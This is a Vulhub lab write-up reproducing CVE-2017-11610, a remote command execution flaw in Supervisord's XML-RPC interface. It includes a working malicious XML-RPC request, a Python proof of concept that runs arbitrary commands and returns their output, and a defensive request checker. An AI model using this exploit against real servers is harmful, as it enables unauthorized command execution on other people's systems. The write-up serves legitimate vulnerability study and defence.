Vulhub vulnerability reproduction 67: Supervisor
2022-07-06 05:16:00 【Revenge_ scan】
CVE-2017-11610: Supervisord remote command execution vulnerability
Preface
Supervisor (http://supervisord.org/) is a client/server service written in Python. It is a process management tool for Linux/Unix systems and does not support Windows. It makes it easy to monitor, start, stop and restart one or more processes.
Reference links:
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- https://blogs.securiteam.com/index.php/archives/3348
- https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
Vulnerability environment
Target: 192.168.4.10_ubuntu
```
#docker-compose build
docker-compose up -d
```
After the environment starts, visit `http://your-ip:9001` to see the Supervisord web page.

Vulnerability testing
Execute arbitrary commands directly :
```http
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
```

Checking inside the container confirms that `/tmp/success` was created.

## About a POC with direct output
@Ricter proposed an idea on Weibo that works very well: write the output of the executed command into the log file, then call Supervisord's own readLog method to read the log file back and retrieve the result.
Here is a simple POC, [poc.py](poc.py), posted directly:
```python
#!/usr/bin/env python3
import sys
import xmlrpc.client

target = sys.argv[1]   # e.g. http://your-ip:9001/RPC2
command = sys.argv[2]  # command to run on the target

with xmlrpc.client.ServerProxy(target) as proxy:
    # Remember how much of the log already exists so only new output is printed
    old = getattr(proxy, 'supervisor.readLog')(0, 0)
    # Locate supervisord's own log file through the same attribute traversal
    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
    # Run the command and append its output to that log file
    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')(
        '{} | tee -a {}'.format(command, logfile))
    # Read the log back and print only the part appended since 'old'
    result = getattr(proxy, 'supervisor.readLog')(0, 0)
    print(result[len(old):])
```
Run it with Python 3 to execute a command and get its output: `./poc.py "http://your-ip:9001/RPC2" "command"`
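As an added defensive example (not part of the original write-up or of Supervisor's own code), the following Python checks an XML-RPC request body for the attribute-traversal shape used in the request and POC above: a legitimate Supervisord call is exactly `namespace.method`, so any deeper dotted path, an unknown namespace, or an underscore-prefixed name is flagged. The allowed-namespace set is an assumption for a default install; the sample bodies are constructed.

```python
import xml.etree.ElementTree as ET
from typing import Optional

# Namespaces a stock Supervisord exposes on /RPC2 (assumption: extend for RPC plugins)
ALLOWED_NAMESPACES = {"supervisor", "system"}


def method_name_from_body(body: str) -> Optional[str]:
    """Return the methodName of an XML-RPC methodCall body, or None if it is not one."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "methodCall":
        return None
    node = root.find("methodName")
    return node.text.strip() if node is not None and node.text else None


def is_traversal_attempt(method: str) -> bool:
    """True when the dotted name cannot be a plain 'namespace.method' RPC call."""
    parts = method.split(".")
    if len(parts) != 2:            # deeper paths walk into Python object attributes
        return True
    namespace, name = parts
    if namespace not in ALLOWED_NAMESPACES or not name:
        return True
    return name.startswith("_")    # private attributes are never RPC methods


def classify(body: str) -> str:
    """Label one request body as 'malformed', 'suspicious' or 'ok'."""
    method = method_name_from_body(body)
    if method is None:
        return "malformed"
    return "suspicious" if is_traversal_attempt(method) else "ok"


# Constructed samples: the request body shown above, and a benign status call.
SUSPICIOUS_BODY = """<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params><param><string>touch /tmp/success</string></param></params>
</methodCall>"""
BENIGN_BODY = """<?xml version="1.0"?>
<methodCall><methodName>supervisor.getAllProcessInfo</methodName><params/></methodCall>"""

if __name__ == "__main__":
    for label, body in (("exploit shape", SUSPICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(f"{label}: {classify(body)}")   # exploit shape: suspicious / benign: ok
```

The same rule can be applied at a reverse proxy in front of port 9001, but the durable fix is upgrading to a Supervisor release containing the referenced commit.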
